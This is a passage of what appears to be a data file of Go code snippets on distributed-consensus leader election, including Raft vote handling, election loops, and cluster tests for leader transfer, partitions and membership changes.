testCreateRaftNode(getTestConfig(ID2, clusterPrefix+ID2), storage)\n\tconnectAllNodes(n1, n2)\n\tn1.Start(fsm1)\n\tn2.Start(fsm2)\n\tn2.ProposeInitialMembership([]string{ID1, ID2})\n\n\t// Wait until a leader is elected.\n\tselect {\n\tcase <-fsm1.leaderCh:\n\tcase <-fsm2.leaderCh:\n\t}\n}", "func (rf *Raft) runElection() {\n\t// get election start time\n\tlastElectionCheck := time.Now()\n\n\trf.mu.Lock()\n\trf.currentTerm++\n\t// persist - updated current term\n\tdata := rf.GetStateBytes(false)\n\trf.persister.SaveRaftState(data)\n\trf.Log(LogInfo, \"running as candidate\")\n\n\t// set as candidate state and vote for ourselves,\n\t// also reset the timer\n\trf.votedFor = rf.me\n\trf.state = Candidate\n\trf.electionTimeout = GetRandomElectionTimeout()\n\n\t// for holding replies - we send out the requests concurrently\n\treplies := make([]*RequestVoteReply, len(rf.peers))\n\tfor servIdx := range rf.peers {\n\t\treplies[servIdx] = &RequestVoteReply{}\n\t}\n\n\t// send out requests concurrently\n\tfor servIdx := range rf.peers {\n\t\tif servIdx != rf.me {\n\t\t\targs := &RequestVoteArgs{\n\t\t\t\tCandidateTerm: rf.currentTerm,\n\t\t\t}\n\n\t\t\t// grab last log index and term - default to snapshot if log is []\n\t\t\tif len(rf.log) > 0 {\n\t\t\t\targs.LastLogIndex = rf.log[len(rf.log)-1].Index\n\t\t\t\targs.LastLogTerm = rf.log[len(rf.log)-1].Term\n\t\t\t} else {\n\t\t\t\targs.LastLogIndex = rf.lastIncludedIndex\n\t\t\t\targs.LastLogTerm = rf.lastIncludedTerm\n\t\t\t}\n\t\t\t// only place the reply into replies, when the RPC completes,\n\t\t\t// to prevent partial data (unsure if this can happen but seems like a good idea)\n\t\t\tgo func(servIdx int) {\n\t\t\t\treply := &RequestVoteReply{}\n\t\t\t\trf.Log(LogDebug, \"Sending RequestVote to servIdx\", servIdx)\n\t\t\t\tok := rf.sendRequestVote(servIdx, args, reply)\n\t\t\t\tif ok {\n\t\t\t\t\trf.Log(LogDebug, \"Received RequestVote reply from server\", servIdx, \"\\n - reply\", reply)\n\t\t\t\t\treplies[servIdx] = reply\n\t\t\t\t}\n\t\t\t}(servIdx)\n\t\t}\n\t}\n\trf.mu.Unlock()\n\n\t// while we still have time on the clock, poll\n\t// for election result\n\tfor !rf.killed() {\n\t\trf.mu.Lock()\n\t\tif rf.state == Follower {\n\t\t\trf.Log(LogInfo, \"now a follower\")\n\t\t\t// we must have received a heartbeat message from a new leader\n\t\t\t// stop the election\n\t\t\trf.mu.Unlock()\n\t\t\treturn\n\t\t} else if rf.electionTimeout > 0 {\n\t\t\t// election still running\n\t\t\t// do a vote count and update time remaining\n\t\t\tcurrentTime := time.Now()\n\t\t\trf.electionTimeout -= (currentTime.Sub(lastElectionCheck))\n\t\t\tlastElectionCheck = currentTime\n\t\t\tvotes := 1 // we vote for ourselves automatically\n\t\t\tfor servIdx := range rf.peers {\n\t\t\t\t// need a successful vote AND need that our term hasn't increased (e.g. if\n\t\t\t\t// since the last loop, we voted for a server with a higher term)\n\t\t\t\tif servIdx != rf.me && replies[servIdx].VoteGranted && replies[servIdx].CurrentTerm == rf.currentTerm {\n\t\t\t\t\tvotes++\n\t\t\t\t}\n\t\t\t}\n\t\t\t// majority vote achieved - set state as leader and\n\t\t\t// start sending heartbeats\n\t\t\tif votes >= int(math.Ceil(float64(len(rf.peers))/2.0)) {\n\t\t\t\trf.Log(LogInfo, \"elected leader\", \"\\n - rf.log:\", rf.log, \"\\n - rf.commitIndex\", rf.commitIndex)\n\t\t\t\trf.state = Leader\n\n\t\t\t\t// get next index of the log for rf.nextIndex\n\t\t\t\tnextIdx := rf.lastIncludedIndex + 1\n\t\t\t\tif len(rf.log) > 0 {\n\t\t\t\t\tnextIdx = rf.log[len(rf.log)-1].Index + 1\n\t\t\t\t}\n\n\t\t\t\t// this volatile state is reinitialized on election\n\t\t\t\tfor servIdx := range rf.peers {\n\t\t\t\t\tif servIdx != rf.me {\n\t\t\t\t\t\trf.nextIndex[servIdx] = nextIdx\n\t\t\t\t\t\trf.matchIndex[servIdx] = 0\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\t\trf.mu.Unlock()\n\t\t\t\tgo rf.heartbeatAppendEntries()\n\t\t\t\treturn\n\t\t\t}\n\t\t} else {\n\t\t\t// no result - need to rerun election\n\t\t\trf.Log(LogInfo, \"timed out as candidate\")\n\t\t\trf.mu.Unlock()\n\t\t\tgo rf.runElection()\n\t\t\treturn\n\t\t}\n\t\trf.mu.Unlock()\n\t\ttime.Sleep(defaultPollInterval)\n\t}\n}", "func (a *RPC) VoteForLeader(args *RequestVoteRPCArgs,reply *bool) error{\n\t//r.ResetTimer()\n \t//fmt.Println(\"received Vote request parameter \",(*args).CandidateId,\" \",(*args).Term,\" \",(*args).LastLogTerm,\" \",(*args).LastLogIndex)\n \t//if len(r.Log)>1{\n \t//\tfmt.Println(\"Vote Request folloer parameter \",r.Id,\" \", r.CurrentTerm,\" \",r.Log[len(r.Log)-1].Term ,\" \",len(r.Log)-1)\n \t//}\n\tif r.IsLeader==2 { // if this server is follower\n\t\t//r.ResetTimer() //TODO\n\t\tif r.CurrentTerm > args.Term || r.VotedFor >-1 { // if follower has updated Term or already voted for other candidate in same term , reply nagative\n\t\t\t*reply = false\n\t\t} else if r.VotedFor== -1{ // if follower has not voted for anyone in current Term \n\t\t\tlastIndex:= len(r.Log) \n\t\t\tif lastIndex > 0 && args.LastLogIndex >0{ // if Candiate log and this server log is not empty. \n\t\t\t\tif r.Log[lastIndex-1].Term > args.LastLogTerm { // and Term of last log in follower is updated than Candidate, reject vote\n *reply=false\n }else if r.Log[lastIndex-1].Term == args.LastLogTerm{ // else if Terms of Follower and candidate is same\n \tif (lastIndex-1) >args.LastLogIndex { // but follower log is more updated, reject vote\n \t\t*reply = false\n \t} else {\n \t\t\t*reply = true // If last log terms is match and followe log is sync with candiate, vote for candidate\n \t\t}\n }else{ // if last log term is not updated and Term does not match, \n \t \t\t*reply=true//means follower is lagging behind candiate in log entries, vote for candidate\n \t\t}\n \t\n\t\t\t} else if lastIndex >args.LastLogIndex { // either of them is Zero\n\t\t\t\t*reply = false // if Follower has entries in Log, its more updated, reject vote\n\t\t\t}else{\n\t\t\t\t\t*reply = true // else Vote for candiate\n\t\t\t\t}\n\t\t}else{\n\t\t\t*reply=false\n\t\t}\n\t}else{\n\t\t*reply = false // This server is already a leader or candiate, reject vote\n\t}\n\n\tif(*reply) {\n r.VotedFor=args.CandidateId // Set Voted for to candiate Id if this server has voted positive\n }\n\t/*if(*reply) {\n\t\tfmt.Println(\"Follower \",r.Id,\" Voted for \",r.VotedFor)\n\t}else{\n\t\tfmt.Println(\"Follower \",r.Id,\" rejected vote for \",args.CandidateId)\n\t}*/\n\treturn nil\n}", "func (rf *Raft) runForElection() {\n\trf.lock()\n\trf.CurrentTerm += 1\n\trf.VotedFor = -1\n\trf.CurrentElectionState = Candidate\n\tad.DebugObj(rf, ad.RPC, \"Starting election and advancing term to %d\", rf.CurrentTerm)\n\trf.writePersist()\n\trepliesChan := make(chan *RequestVoteReply, len(rf.peers)-1)\n\t// The term the election was started in\n\telectionTerm := rf.CurrentTerm\n\trf.unlock()\n\n\tfor peerNum, _ := range rf.peers {\n\t\tif peerNum == rf.me {\n\t\t\trf.lock()\n\t\t\trf.VotedFor = rf.me\n\t\t\tad.DebugObj(rf, ad.TRACE, \"voting for itself\")\n\t\t\trf.writePersist()\n\t\t\trf.unlock()\n\t\t} else {\n\t\t\tgo func(peerNum int, repliesChan chan *RequestVoteReply) {\n\t\t\t\trf.sendRequestVote(peerNum, repliesChan)\n\t\t\t}(peerNum, repliesChan)\n\t\t}\n\t}\n\n\tyesVotes := 1 // from yourself\n\tnoVotes := 0\n\trequiredToWin := rf.majoritySize()\n\tfor range rf.peers {\n\t\treply := <-repliesChan\n\n\t\trf.lock()\n\t\tassert(rf.CurrentElectionState != Leader)\n\t\tif rf.CurrentTerm != electionTerm {\n\t\t\tad.DebugObj(rf, ad.TRACE, \"advanced to term %d while counting results of election for term %d. \"+\n\t\t\t\t\"Abandoning election.\")\n\t\t\trf.unlock()\n\t\t\treturn\n\t\t}\n\n\t\tif reply.VoteGranted {\n\t\t\tyesVotes++\n\t\t} else {\n\t\t\tnoVotes++\n\t\t}\n\n\t\tad.DebugObj(rf, ad.TRACE, \"Got %+v from server %d, yes votes now at %d out of a required %d\",\n\t\t\treply, reply.VoterId, yesVotes, requiredToWin)\n\t\tif yesVotes >= requiredToWin {\n\t\t\tad.DebugObj(rf, ad.RPC, \"Won election!\")\n\t\t\t// non-blocking send\n\t\t\t// send the term number to prevent a bug where the raft advances to a new term before it notices it's\n\t\t\t// become a leader, so it becomes a second false leader.\n\t\t\tgo func(term int) { rf.becomeLeader <- term }(rf.CurrentTerm)\n\t\t\trf.unlock()\n\t\t\treturn\n\t\t} else if noVotes >= requiredToWin {\n\t\t\tad.DebugObj(rf, ad.RPC, \"Got %d no votes, can't win election. Reverting to follower\", noVotes)\n\t\t\trf.CurrentElectionState = Follower\n\t\t\trf.writePersist()\n\t\t\trf.unlock()\n\t\t\treturn\n\t\t} else {\n\t\t\trf.unlock()\n\t\t\t// wait for more votes\n\t\t}\n\t}\n}", "func leaderElection(nodeCtx *NodeCtx) {\n\t// The paper doesnt specifically mention any leader election protocols, so we assume that the leader election protocol\n\t// used in bootstrap is also used in the normal protocol, with the adition of iteration (unless the same leader would\n\t// be selected).\n\n\t// TODO actually add a setup phase where one must publish their hash. This way there will always\n\t// be a leader even if some nodes are offline. But with the assumption that every node is online\n\t// this works fine.\n\n\t// get current randomness\n\trecBlock := nodeCtx.blockchain.getLastReconfigurationBlock()\n\trnd := recBlock.Randomness\n\n\t// get current iteration\n\t_currIteration := nodeCtx.i.getI()\n\tcurrI := make([]byte, 8)\n\tbinary.LittleEndian.PutUint64(currI, uint64(_currIteration))\n\n\tlistOfHashes := make([]byte32sortHelper, len(nodeCtx.committee.Members))\n\t// calculate hash(id | rnd | currI) for every member\n\tii := 0\n\tfor _, m := range nodeCtx.committee.Members {\n\t\tconnoctated := byteSliceAppend(m.Pub.Bytes[:], rnd[:], currI)\n\t\thsh := hash(connoctated)\n\t\tlistOfHashes[ii] = byte32sortHelper{m.Pub.Bytes, hsh}\n\t\tii++\n\t}\n\n\t// sort list\n\tlistOfHashes = sortListOfByte32SortHelper(listOfHashes)\n\n\t// calculate hash of self\n\tselfHash := hash(byteSliceAppend(nodeCtx.self.Priv.Pub.Bytes[:], rnd[:], currI))\n\t// fmt.Println(\"self: \", bytes32ToString(selfHash), bytes32ToString(nodeCtx.self.Priv.Pub.Bytes))\n\t// for i, lof := range listOfHashes {\n\t// \tfmt.Println(i, bytes32ToString(lof.toSort), bytes32ToString(lof.original))\n\t// }\n\n\t// the leader is the lowest in list except if selfHash is lower than that.\n\t// fmt.Println(byte32Operations(selfHash, \"<\", listOfHashes[0].toSort))\n\tif byte32Operations(selfHash, \"<\", listOfHashes[0].toSort) {\n\t\tnodeCtx.committee.CurrentLeader = nodeCtx.self.Priv.Pub\n\t\tlog.Println(\"I am leader!\", nodeCtx.amILeader())\n\t} else {\n\t\tleader := listOfHashes[0].original\n\t\tnodeCtx.committee.CurrentLeader = nodeCtx.committee.Members[leader].Pub\n\t}\n}", "func TestLeaderTransferWithCheckQuorum(t *testing.T) {\n\tnt := newNetwork(nil, nil, nil)\n\tdefer nt.closeAll()\n\tfor i := 1; i < 4; i++ {\n\t\tr := nt.peers[uint64(i)].(*raft)\n\t\tr.checkQuorum = true\n\t\tsetRandomizedElectionTimeout(r, r.electionTimeout+i)\n\t}\n\n\t// Letting peer 2 electionElapsed reach to timeout so that it can vote for peer 1\n\tf := nt.peers[2].(*raft)\n\tfor i := 0; i < f.electionTimeout; i++ {\n\t\tf.tick()\n\t}\n\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\tlead := nt.peers[1].(*raft)\n\n\tif lead.lead != 1 {\n\t\tt.Fatalf(\"after election leader is %x, want 1\", lead.lead)\n\t}\n\n\t// Transfer leadership to 2.\n\tnt.send(pb.Message{From: 2, To: 1, Type: pb.MsgTransferLeader})\n\n\tcheckLeaderTransferState(t, lead, StateFollower, 2)\n\n\t// After some log replication, transfer leadership back to 1.\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{}}})\n\n\tnt.send(pb.Message{From: 1, To: 2, Type: pb.MsgTransferLeader})\n\n\tcheckLeaderTransferState(t, lead, StateLeader, 1)\n}", "func TestV3ElectionObserve(t *testing.T) {\n\tintegration.BeforeTest(t)\n\tclus := integration.NewCluster(t, &integration.ClusterConfig{Size: 1})\n\tdefer clus.Terminate(t)\n\n\tlc := integration.ToGRPC(clus.Client(0)).Election\n\n\t// observe leadership events\n\tobservec := make(chan struct{}, 1)\n\tgo func() {\n\t\tdefer close(observec)\n\t\ts, err := lc.Observe(context.Background(), &epb.LeaderRequest{Name: []byte(\"foo\")})\n\t\tobservec <- struct{}{}\n\t\tif err != nil {\n\t\t\tt.Error(err)\n\t\t}\n\t\tfor i := 0; i < 10; i++ {\n\t\t\tresp, rerr := s.Recv()\n\t\t\tif rerr != nil {\n\t\t\t\tt.Error(rerr)\n\t\t\t}\n\t\t\trespV := 0\n\t\t\tfmt.Sscanf(string(resp.Kv.Value), \"%d\", &respV)\n\t\t\t// leader transitions should not go backwards\n\t\t\tif respV < i {\n\t\t\t\tt.Errorf(`got observe value %q, expected >= \"%d\"`, string(resp.Kv.Value), i)\n\t\t\t}\n\t\t\ti = respV\n\t\t}\n\t}()\n\n\tselect {\n\tcase <-observec:\n\tcase <-time.After(time.Second):\n\t\tt.Fatalf(\"observe stream took too long to start\")\n\t}\n\n\tlease1, err1 := integration.ToGRPC(clus.RandClient()).Lease.LeaseGrant(context.TODO(), &pb.LeaseGrantRequest{TTL: 30})\n\tif err1 != nil {\n\t\tt.Fatal(err1)\n\t}\n\tc1, cerr1 := lc.Campaign(context.TODO(), &epb.CampaignRequest{Name: []byte(\"foo\"), Lease: lease1.ID, Value: []byte(\"0\")})\n\tif cerr1 != nil {\n\t\tt.Fatal(cerr1)\n\t}\n\n\t// overlap other leader so it waits on resign\n\tleader2c := make(chan struct{})\n\tgo func() {\n\t\tdefer close(leader2c)\n\n\t\tlease2, err2 := integration.ToGRPC(clus.RandClient()).Lease.LeaseGrant(context.TODO(), &pb.LeaseGrantRequest{TTL: 30})\n\t\tif err2 != nil {\n\t\t\tt.Error(err2)\n\t\t}\n\t\tc2, cerr2 := lc.Campaign(context.TODO(), &epb.CampaignRequest{Name: []byte(\"foo\"), Lease: lease2.ID, Value: []byte(\"5\")})\n\t\tif cerr2 != nil {\n\t\t\tt.Error(cerr2)\n\t\t}\n\t\tfor i := 6; i < 10; i++ {\n\t\t\tv := []byte(fmt.Sprintf(\"%d\", i))\n\t\t\treq := &epb.ProclaimRequest{Leader: c2.Leader, Value: v}\n\t\t\tif _, err := lc.Proclaim(context.TODO(), req); err != nil {\n\t\t\t\tt.Error(err)\n\t\t\t}\n\t\t}\n\t}()\n\n\tfor i := 1; i < 5; i++ {\n\t\tv := []byte(fmt.Sprintf(\"%d\", i))\n\t\treq := &epb.ProclaimRequest{Leader: c1.Leader, Value: v}\n\t\tif _, err := lc.Proclaim(context.TODO(), req); err != nil {\n\t\t\tt.Fatal(err)\n\t\t}\n\t}\n\t// start second leader\n\tlc.Resign(context.TODO(), &epb.ResignRequest{Leader: c1.Leader})\n\n\tselect {\n\tcase <-observec:\n\tcase <-time.After(time.Second):\n\t\tt.Fatalf(\"observe did not observe all events in time\")\n\t}\n\n\t<-leader2c\n}", "func (r *Raft) candidate(timeout int) int {\n\twaitTime := timeout //added for passing timeout from outside--In SingleServerBinary\n\tresendTime := 5 //should be much smaller than waitTime\n\tElectionTimer := r.StartTimer(ElectionTimeout, waitTime)\n\t//This loop is for election process which keeps on going until a leader is elected\n\tfor {\n\t\t//reset the Votes else it will reflect the Votes received in last Term\n\t\tr.resetVotes()\n\t\tr.myCV.CurrentTerm += 1 //increment current Term\n\t\tr.myCV.VotedFor = r.Myconfig.Id //Vote for self\n\t\tr.WriteCVToDisk() //write Current Term and VotedFor to disk\n\t\tr.f_specific[r.Myconfig.Id].Vote = true //vote true\n\t\treqVoteObj := r.prepRequestVote() //prepare request Vote obj\n\t\tr.sendToAll(reqVoteObj) //send requests for Vote to all servers\n\t\tResendVoteTimer := r.StartTimer(ResendVoteTimeOut, resendTime)\n\t\tfor { //this loop for reading responses from all servers\n\t\t\treq := r.receive()\n\t\t\tswitch req.(type) {\n\t\t\tcase ClientAppendReq: ///candidate must also respond as false just like follower\n\t\t\t\trequest := req.(ClientAppendReq) //explicit typecasting\n\t\t\t\tresponse := ClientAppendResponse{}\n\t\t\t\tlogItem := LogItem{r.CurrentLogEntryCnt, false, request.Data} //lsn is count started from 0\n\t\t\t\tr.CurrentLogEntryCnt += 1\n\t\t\t\tresponse.LogEntry = logItem\n\t\t\t\tr.CommitCh <- &response.LogEntry\n\t\t\tcase RequestVoteResponse: //got the Vote response\n\t\t\t\tresponse := req.(RequestVoteResponse) //explicit typecasting so that fields of struct can be used\n\t\t\t\tif response.VoteGranted {\n\t\t\t\t\tr.f_specific[response.Id].Vote = true\n\t\t\t\t}\n\t\t\t\tVoteCount := r.countVotes()\n\t\t\t\tif VoteCount >= majority {\n\t\t\t\t\tResendVoteTimer.Stop()\n\t\t\t\t\tElectionTimer.Stop()\n\t\t\t\t\tr.LeaderConfig.Id = r.Myconfig.Id //update leader details\n\t\t\t\t\treturn leader //become the leader\n\t\t\t\t}\n\n\t\t\tcase AppendEntriesReq: //received an AE request instead of Votes, i.e. some other leader has been elected\n\t\t\t\trequest := req.(AppendEntriesReq)\n\t\t\t\tretVal := r.serviceAppendEntriesReq(request, nil, 0, candidate)\n\t\t\t\tif retVal == follower {\n\t\t\t\t\tResendVoteTimer.Stop()\n\t\t\t\t\tElectionTimer.Stop()\n\t\t\t\t\treturn follower\n\t\t\t\t}\n\n\t\t\tcase RequestVote:\n\t\t\t\trequest := req.(RequestVote)\n\t\t\t\t//==Can be shared with service request vote with additinal param of caller(candidate or follower)\n\t\t\t\tresponse := RequestVoteResponse{} //prep response object,for responding back to requester\n\t\t\t\tcandidateId := request.CandidateId\n\t\t\t\tresponse.Id = r.Myconfig.Id\n\t\t\t\tif r.isDeservingCandidate(request) {\n\t\t\t\t\tresponse.VoteGranted = true\n\t\t\t\t\tr.myCV.VotedFor = candidateId\n\t\t\t\t\tr.myCV.CurrentTerm = request.Term\n\t\t\t\t\tif request.Term > r.myCV.CurrentTerm { //write to disk only when value has changed\n\t\t\t\t\t\tr.WriteCVToDisk()\n\t\t\t\t\t}\n\t\t\t\t\tResendVoteTimer.Stop()\n\t\t\t\t\tElectionTimer.Stop()\n\t\t\t\t\treturn follower\n\t\t\t\t} else {\n\t\t\t\t\tresponse.VoteGranted = false\n\t\t\t\t}\n\t\t\t\tresponse.Term = r.myCV.CurrentTerm\n\t\t\t\tr.send(candidateId, response)\n\n\t\t\tcase int:\n\t\t\t\ttimeout := req.(int)\n\t\t\t\tif timeout == ResendVoteTimeOut {\n\t\t\t\t\trT := msecs * time.Duration(resendTime)\n\t\t\t\t\tResendVoteTimer.Reset(rT)\n\t\t\t\t\treqVoteObj := r.prepRequestVote() //prepare request Vote agn and send to all, ones rcvg the vote agn will vote true agn so won't matter and countVotes func counts no.of true entries\n\t\t\t\t\tr.sendToAll(reqVoteObj)\n\t\t\t\t} else if timeout == ElectionTimeout {\n\t\t\t\t\twaitTime_msecs := msecs * time.Duration(waitTime)\n\t\t\t\t\tElectionTimer.Reset(waitTime_msecs)\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n}", "func TestLearnerCannotVote(t *testing.T) {\n\tn2 := newTestLearnerRaft(2, []uint64{1}, []uint64{2}, 10, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(n2)\n\n\tn2.becomeFollower(1, None)\n\n\tn2.Step(pb.Message{From: 1, To: 2, Term: 2, Type: pb.MsgVote, LogTerm: 11, Index: 11})\n\n\tif len(n2.msgs) != 0 {\n\t\tt.Errorf(\"expect learner not to vote, but received %v messages\", n2.msgs)\n\t}\n}", "func TestChangeConfig_removeVoters(t *testing.T) {\n\t// launch 5 node cluster\n\tc, ldr, flrs := launchCluster(t, 5)\n\tdefer c.shutdown()\n\n\t// wait for commit ready\n\tc.waitCommitReady(ldr)\n\n\telectionAborted0 := c.registerFor(eventElectionAborted, flrs[0])\n\tdefer c.unregister(electionAborted0)\n\telectionAborted1 := c.registerFor(eventElectionAborted, flrs[1])\n\tdefer c.unregister(electionAborted1)\n\n\t// submit ChangeConfig with two voters removed\n\tconfig := c.info(ldr).Configs.Latest\n\tif err := config.SetAction(flrs[0].nid, Remove); err != nil {\n\t\tt.Fatal(err)\n\t}\n\tif err := config.SetAction(flrs[1].nid, Remove); err != nil {\n\t\tt.Fatal(err)\n\t}\n\tc.ensure(waitTask(ldr, ChangeConfig(config), c.longTimeout))\n\n\t// wait for stable config\n\tc.ensure(waitTask(ldr, WaitForStableConfig(), c.longTimeout))\n\n\t// ensure that removed nodes aborted election\n\te, err := electionAborted0.waitForEvent(c.longTimeout)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\tif e.reason != \"not voter\" {\n\t\tc.Fatalf(\"reason=%q, want %q\", e.reason, \"not part of cluster\")\n\t}\n\t_, err = electionAborted1.waitForEvent(c.longTimeout)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\tif e.reason != \"not voter\" {\n\t\tc.Fatalf(\"reason=%q, want %q\", e.reason, \"not part of cluster\")\n\t}\n\n\t// shutdown the removed nodes\n\tc.shutdown(flrs[0], flrs[1])\n\n\t// shutdown the leader\n\tc.shutdown(ldr)\n\n\t// wait for leader among the remaining two nodes\n\tc.waitForLeader(flrs[2], flrs[3])\n}", "func TestClusterNodeVacation(t *testing.T) {\n\tif testing.Short() {\n\t\tt.Skip(\"skipping cluster test in short mode.\")\n\t}\n\tt.Parallel()\n\n\ttc := newTestCluster(t)\n\tdefer tc.tearDown()\n\n\ttc.addSequinses(3)\n\ttc.makeVersionAvailable(v2)\n\ttc.sequinses[0].expectProgression(down, noVersion, v2, down, v3)\n\ttc.sequinses[1].expectProgression(down, noVersion, v2, v3)\n\ttc.sequinses[2].expectProgression(down, noVersion, v2, v3)\n\n\ttc.setup()\n\ttc.startTest()\n\ttime.Sleep(expectTimeout)\n\n\ttc.sequinses[0].stop()\n\ttime.Sleep(expectTimeout)\n\n\ttc.makeVersionAvailable(v3)\n\ttc.sequinses[1].hup()\n\ttc.sequinses[2].hup()\n\ttime.Sleep(expectTimeout)\n\n\ttc.sequinses[0].start()\n\ttc.assertProgression()\n}", "func TestPartition(t *testing.T) {\n\traftConf := &RaftConfig{MemberRegSocket: \"127.0.0.1:8124\", PeerSocket: \"127.0.0.1:9987\", TimeoutInMillis: 1500, HbTimeoutInMillis: 150, LogDirectoryPath: \"logs1\", StableStoreDirectoryPath: \"./stable1\", RaftLogDirectoryPath: \"../LocalLog1\"}\n\n\t// delete stored state to avoid unnecessary effect on following test cases\n\tinitState(raftConf.StableStoreDirectoryPath, raftConf.LogDirectoryPath, raftConf.RaftLogDirectoryPath)\n\n\t// launch cluster proxy servers\n\tcluster.NewProxyWithConfig(RaftToClusterConf(raftConf))\n\n\tfmt.Println(\"Started Proxy\")\n\n\ttime.Sleep(100 * time.Millisecond)\n\n\tserverCount := 5\n\traftServers := make([]raft.Raft, serverCount+1)\n\tpseudoClusters := make([]*test.PseudoCluster, serverCount+1)\n\n\tfor i := 1; i <= serverCount; i += 1 {\n\t\t// create cluster.Server\n\t\tclusterServer, err := cluster.NewWithConfig(i, \"127.0.0.1\", 8500+i, RaftToClusterConf(raftConf))\n\t\tpseudoCluster := test.NewPseudoCluster(clusterServer)\n\t\tif err != nil {\n\t\t\tt.Errorf(\"Error in creating cluster server. \" + err.Error())\n\t\t\treturn\n\t\t}\n\n\t\tlogStore, err := llog.Create(raftConf.RaftLogDirectoryPath + \"/\" + strconv.Itoa(i))\n\t\tif err != nil {\n\t\t\tt.Errorf(\"Error in creating log. \" + err.Error())\n\t\t\treturn\n\t\t}\n\n\t\ts, err := NewWithConfig(pseudoCluster, logStore, raftConf)\n\t\tif err != nil {\n\t\t\tt.Errorf(\"Error in creating Raft servers. \" + err.Error())\n\t\t\treturn\n\t\t}\n\t\traftServers[i] = s\n\t\tpseudoClusters[i] = pseudoCluster\n\t}\n\n\t// wait for leader to be elected\n\ttime.Sleep(20 * time.Second)\n\tcount := 0\n\toldLeader := 0\n\tfor i := 1; i <= serverCount; i += 1 {\n\t\tif raftServers[i].Leader() == raftServers[i].Pid() {\n\t\t\toldLeader = i\n\t\t\tcount++\n\t\t}\n\t}\n\tif count != 1 {\n\t\tt.Errorf(\"No leader was chosen in 1 minute\")\n\t\treturn\n\t}\n\n\t// isolate Leader and any one follower\n\tfollower := 0\n\tfor i := 1; i <= serverCount; i += 1 {\n\t\tif i != oldLeader {\n\t\t\tfollower = i\n\t\t\tbreak\n\t\t}\n\t}\n\tfmt.Println(\"Server \" + strconv.Itoa(follower) + \" was chosen as follower in minority partition\")\n\tfor i := 1; i <= serverCount; i += 1 {\n\t\tpseudoClusters[oldLeader].AddToInboxFilter(raftServers[i].Pid())\n\t\tpseudoClusters[oldLeader].AddToOutboxFilter(raftServers[i].Pid())\n\t\tpseudoClusters[follower].AddToInboxFilter(raftServers[i].Pid())\n\t\tpseudoClusters[follower].AddToOutboxFilter(raftServers[i].Pid())\n\t}\n\n\tpseudoClusters[oldLeader].AddToOutboxFilter(cluster.BROADCAST)\n\tpseudoClusters[follower].AddToOutboxFilter(cluster.BROADCAST)\n\n\t// wait for other servers to discover that leader\n\t// has crashed and to elect a new leader\n\ttime.Sleep(20 * time.Second)\n\n\tcount = 0\n\tfor i := 1; i <= serverCount; i += 1 {\n\n\t\tif i != oldLeader && i != follower && raftServers[i].Leader() == raftServers[i].Pid() {\n\t\t\tfmt.Println(\"Server \" + strconv.Itoa(i) + \" was chosen as new leader in majority partition.\")\n\t\t\tcount++\n\t\t}\n\t}\n\t// new leader must be chosen\n\tif count != 1 {\n\t\tt.Errorf(\"No leader was chosen in majority partition\")\n\t}\n}", "func TestShiftToLeaderElection(t *testing.T) {\n\tp := newPaxos(&Config{ID: 1, NodeCount: 3})\n\n\tconst newView = 7\n\tp.shiftToLeaderElection(newView)\n\n\tassertState(t, p, StateLeaderElection)\n\tif p.progressTimer.isSet() {\n\t\tt.Fatalf(\"expected unset progress timer\")\n\t}\n\tif p.prepare != nil {\n\t\tt.Fatalf(\"expected nil *pb.Prepare\")\n\t}\n\tif len(p.prepareOKs) > 0 {\n\t\tt.Fatalf(\"expected empty prepareOKs set\")\n\t}\n\tif len(p.lastEnqueued) > 0 {\n\t\tt.Fatalf(\"expected empty lastEnqueued set\")\n\t}\n\tif p.lastAttempted != newView {\n\t\tt.Fatalf(\"expected lastAttempted view %d, found %d\", newView, p.lastAttempted)\n\t}\n\n\texpViewChanges := map[uint64]*pb.ViewChange{\n\t\t1: &pb.ViewChange{\n\t\t\tNodeId: 1,\n\t\t\tAttemptedView: 7,\n\t\t},\n\t}\n\tif !reflect.DeepEqual(p.viewChanges, expViewChanges) {\n\t\tt.Errorf(\"expected view changes %+v, found %+v\", expViewChanges, p.viewChanges)\n\t}\n}", "func TestRaftRemoveLeader(t *testing.T) {\n\tID1 := \"1\"\n\tID2 := \"2\"\n\tID3 := \"3\"\n\tclusterPrefix := \"TestRaftRemoveLeader\"\n\n\t// Create n1 node.\n\tfsm1 := newTestFSM(ID1)\n\tn1 := testCreateRaftNode(getTestConfig(ID1, clusterPrefix+ID1), newStorage())\n\t// Create n2.\n\tfsm2 := newTestFSM(ID2)\n\tn2 := testCreateRaftNode(getTestConfig(ID2, clusterPrefix+ID2), newStorage())\n\t// Create n3.\n\tfsm3 := newTestFSM(ID3)\n\tn3 := testCreateRaftNode(getTestConfig(ID3, clusterPrefix+ID3), newStorage())\n\n\tconnectAllNodes(n1, n2, n3)\n\n\t// The cluster starts with only one node -- n1.\n\tn1.Start(fsm1)\n\tn1.ProposeInitialMembership([]string{ID1})\n\n\t// Wait it becomes to leader.\n\t<-fsm1.leaderCh\n\n\t// Add n2 to the cluster.\n\tpending := n1.AddNode(ID2)\n\tn2.Start(fsm2)\n\t// Wait until n2 gets joined.\n\t<-pending.Done\n\n\t// Add n3 to the cluster.\n\tpending = n1.AddNode(ID3)\n\tn3.Start(fsm3)\n\t// Wait until n3 gets joined.\n\t<-pending.Done\n\n\t// Now we have a cluster with 3 nodes and n1 as the leader.\n\n\t// Remove the leader itself.\n\tn1.RemoveNode(ID1)\n\n\t// A new leader should be elected in new configuration(n2, n3).\n\tvar newLeader *Raft\n\tselect {\n\tcase <-fsm2.leaderCh:\n\t\tnewLeader = n2\n\tcase <-fsm3.leaderCh:\n\t\tnewLeader = n1\n\t}\n\n\tnewLeader.Propose([]byte(\"data1\"))\n\tnewLeader.Propose([]byte(\"data2\"))\n\tnewLeader.Propose([]byte(\"data3\"))\n\n\t// Now n2 and n3 should commit newly proposed entries eventually>\n\tif !testEntriesEqual(fsm2.appliedCh, fsm3.appliedCh, 3) {\n\t\tt.Fatal(\"two FSMs in same group applied different sequence of commands.\")\n\t}\n}", "func (node *Node) startElectionTimer() {\n\telectionTimeout := node.randElectionTimeout()\n\n\tnode.mu.Lock()\n\ttimerStartTerm := node.currentTerm\n\tnode.mu.Unlock()\n\n\tticker := 